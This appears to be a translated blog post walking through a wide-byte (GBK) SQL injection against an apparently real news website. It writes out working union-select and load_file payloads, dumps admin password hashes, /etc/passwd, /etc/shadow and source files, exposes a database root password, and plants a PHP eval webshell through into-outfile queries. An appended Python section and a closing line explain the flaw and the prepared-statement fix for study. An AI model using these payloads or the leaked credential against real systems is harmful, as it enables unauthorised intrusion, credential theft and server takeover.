好得很程序员自学网


A wide-character injection penetration walkthrough - Website Security - Self-taught PHP

Site: http:// HdhCmsTest2cto测试数据 (stands in for the target site; it is not this site)
Injection point: http://HdhCmsTest2cto测试数据 /news_view.php?id=94

Submitting %bf' produces an error, which shows that a wide-byte injection exists.
Next, %bf%27 and 1=1 %23 returns normally.
%bf%27 order by 10 %23 also returns normally, so the column count of the current page is 10.

Continuing the test:
%bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23
returns normally and displays 3 and 9.
Using database() reveals the database name: international.

Dump the tables directly. First, the dual table was used to check whether information_schema.tables was available; the check returned 3 and 9, so information_schema.tables is usable.
Then replace 3 with table_name and append the condition where TABLE_NAME=0x696E7465726E6174696F6E616C (the hex encoding of international). This returns the table name i_admin, presumably the table holding the administrator accounts.
Stepping through with limit, the tables are:
i_admin
i_application_configs
i_application_information_step1
i_application_information_step2
i_application_information_step3
i_application_userbasic
i_count
i_department
... the rest are not dumped.

Next, dump the columns of i_admin. 1,2,3,4,5,6,7,8,9,10 from information_schema.COLUMNS returns the numbers normally. The hex encoding of i_admin is 0x695F61646D696E; with the where condition added it returns the column uid, and adding a limit condition dumps all the columns:
uid
m_id
username
password
name
state
With that, all column names of i_admin are obtained.

Next, dump username and password. A problem appears: switching to username and password returns an error, while uid and state do not. Hex encoding solves the problem:
Hex(username) returns 6A73, i.e. js
Hex(password) returns 63316661363261616xxxxxxxxxxxx64323062383732666663366531303936, i.e. c1fa62aaeb049f62d20b872ffc6e1096
The remaining accounts were dumped the same way. At this point the back-end password is obtained.

Another approach. Since this is root privilege, we got this far:

load_file(0x2F6574632F706173737764) // read the /etc/passwd file
Returned the contents of /etc/passwd.

Website directory found. Read /opt/www_application/xxxxx/news_view.php:
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870),char(60),char(32))

<?php
include_once('global.php');
if(isset($_GET[id])){
    $sql="update i_newsbase set hits=hits+1 where id=".$_GET[id];
    mysql_query($sql);
    $query_view = mysql_query("SELECT * FROM `i_newsbase` WHERE `id`='$_GET[id]';");
    $row_view = mysql_fetch_array($query_view);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://HdhCmsTestw3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://HdhCmsTestw3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GB2312"/>
<title><?=$row_view[title]?> –<?=$row_arr[websitename]?></title>
<?php include_once('header.php');?>
<!--contene-->
<div id="contene_">
<div id="box_l"><div id="box_r"><div id="l_box">
<div class="h_700">
<div class="blue"><h3>Focus News</h3></div>
<?php $query_news = mysql_query("SELECT * FROM `i_newsbase` order by `date_time` desc limit 12 ");
while($row_news = mysql_fetch_array($query_news)){ ?>
<p class="p"><span><a title="<?=$row_news[title]?>" href="news_view.php?id=<?=$row_news[id]?>">
<?php if(strlen($row_news[title])>40) { echo $db->titlesubstr($row_news[title],0,40)."…"; } else echo $row_news[title]; ?>
</a></span></p>
<?php } ?>
</p></div></div></div></div>
<div id="box_l_"><div id="box_r_"><div id="r_box">
<div class="blue"><h3><a href="index.php">Home</a><span>»</span><a href="news_list.php">News</a></h3></div>
<div class="text"><div class="title">
<?php $query_all = mysql_query("SELECT * FROM `i_newsbase` as `a`,`i_newscontent` as `b` where `a`.`id`=`b`.`nid` and `a`.`id`='$_GET[id]' limit 1;");
$row_all = mysql_fetch_array($query_all); ?>
<div align="center"><?=$row_all[title]?></div>
<p></p>
<p class="font" align="center">Date:<?=date("Y-m-d",$row_all[date_time])?></p>
</div>
<?=$row_all[content]?></div>
<div class="clear"></div>
</div></div></div>
<div class="clear"></div>
<div id="ad"></div></div>
<?php include_once('footer.php'); ?>

Next read global.php: /opt/www_application/xxxxx/global.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870),char(60),char(32))
Returned:

<?php
include_once('./configs/config.php');
include_once('./common/mysql.class.php');
include_once('./common/action.class.php');
include_once('./common/page.class.php');
$db = new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);
$query_config=$db->query("SELECT * FROM `i_config`");
while($row_config=$db->fetch_array($query_config)){
    $row_arr[$row_config[name]]=$row_config[values];
    $row_eng[$row_config[name]]=$row_config[xxxxx_values];
}
?>

Read ./configs/config.php. First tried /opt/www_application/configs/config.php:
0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870),char(60),char(32))
Returned empty: no such file.

Then /opt/www_application/xxxxx/configs/config.php:
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870),char(60),char(32))
Returned:

<?php
include_once('db_config.php');
include_once('variable_config.php');
/******************************************************************************
 Upload image parameters:
 $max_file_size : upload file size limit, in bytes
 $destination_folder : upload file path
 $watermark : whether to add a watermark (1 = add watermark, anything else = none);
 Usage:
 1. Remove the ";" in front of the line "extension=php_gd2.dll" in PHP.INI, because the GD library is needed;
 2. Set extension_dir = to the directory containing your php_gd2.dll;
 ******************************************************************************/
// list of permitted upload file types
$uptypes=array('image/jpg', 'image/jpeg', 'image/png', 'image/pjpeg', 'image/gif', 'image/bmp', 'image/x-png');
$max_file_size=2000000;          // upload file size limit, in bytes
$destination_folder="uploading/"; // upload file path
$watermark=1;        // add a watermark (1 = yes, anything else = no)
$watertype=1;        // watermark type (1 = text, 2 = image)
$waterposition=1;    // watermark position (1 = bottom left, 2 = bottom right, 3 = top left, 4 = top right, 5 = centered)
$waterstring="TY";   // watermark string
$waterimg="xplore.gif"; // watermark image
$imgpreview=1;       // generate a preview image (1 = yes, anything else = no)
$imgpreviewsize=1/1; // thumbnail ratio
?>

/opt/www_application/xxxxx/configs/db_config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870),char(60),char(32))
Returned:

<?php
// this file stores the variables for the user database
$mydbhost = "localhost";
$mydbuser = "root";
$mydbpw = "xyw1120";
$mydbname = "international";
$mydbcharset = "GBK";
?>

Goal reached: MySQL account root, password xyw1120.

/opt/www_application/xxxxx/1.php
select "dddd" into outfile '/var/www/data/suddytest.php'
select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'
select '<?php echo "HelloWorld"; ?>' into outfile '/opt/www_application/xxxxx/index2.php'
757365726E616D65

/etc/vpn/server.conf
0x2F6574632F76706E2F736572766572 E636F6E66
replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))

Port scan:
80 open
111 open
1723 open
3306 open
1723 is the VPN port; approach from that angle... Continue the penetration.

Read /etc/shadow: 0x2F6574632F736861646F77
replace(load_file(0x2F6574632F736861646F77),char(60),char(32))
The contents (the password hash entries for every account) were returned.

Author: 137747998@qq测试数据
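The following Python is added here as an illustration and is not code from the original post. It models at byte level why the %bf%27 probe at the start of the walkthrough breaks out of the quoted id when the connection charset is GBK (as the recovered db_config.php sets with $mydbcharset = "GBK") and quotes are escaped byte-wise in the style of addslashes(), and why charset-aware escaping, the behaviour of mysql_real_escape_string() once mysql_set_charset('gbk') has been called, closes the gap; the escaper and the lexer are simplified re-implementations of mine, not MySQL's code.

```python
# Added example, not code from the original post: why the %bf%27 probe escapes the
# quoted id on a GBK connection (db_config.php sets $mydbcharset = "GBK") when quotes
# are escaped byte-wise like addslashes(), and why charset-aware escaping defeats it.
def is_gbk_pair(lead: int, trail: int) -> bool:
    """GBK character: lead 0x81-0xFE, trail 0x40-0x7E or 0x80-0xFE (0x5C qualifies)."""
    return 0x81 <= lead <= 0xFE and (0x40 <= trail <= 0x7E or 0x80 <= trail <= 0xFE)

def addslashes(raw: bytes) -> bytes:
    """Charset-blind escaping like PHP addslashes(): backslash before ', ", \\, NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def mysql_real_escape_gbk(raw: bytes) -> bytes:
    """Simplified mysql_real_escape_string() after mysql_set_charset('gbk'): a lead byte
    with no valid trail is itself escaped, so it cannot pair with the added backslash."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if i + 1 < len(raw) and is_gbk_pair(b, raw[i + 1]):
            out += raw[i:i + 2]   # a complete GBK character is copied untouched
            i += 2
            continue
        if 0x81 <= b <= 0xFE or b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)

def server_sees_unescaped_quote(escaped: bytes) -> bool:
    """Model of the server's literal lexer on a GBK connection: a valid GBK pair is one
    character, else a backslash consumes the next byte, else a bare ' ends the literal."""
    i = 0
    while i < len(escaped):
        b = escaped[i]
        if (i + 1 < len(escaped) and is_gbk_pair(b, escaped[i + 1])) or b == 0x5C:
            i += 2            # 0xBF 0x5C is swallowed as one character: the quote is free
        elif b == 0x27:
            return True       # injection: the literal closes early
        else:
            i += 1
    return False

# Constructed inputs: the page's probe URL-decoded, a plain ASCII attempt, and
# legitimate GBK text (0xD6 0xD0 is the character 中) followed by a quote.
WIDE_BYTE_PROBE = b"\xbf' and 1=1 #"
ASCII_PROBE = b"' or 1=1 #"
GBK_TEXT = b"\xd6\xd0' x"
```

Parameterised queries (mysqli/PDO prepared statements) avoid the question entirely, because the id never enters the SQL text.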

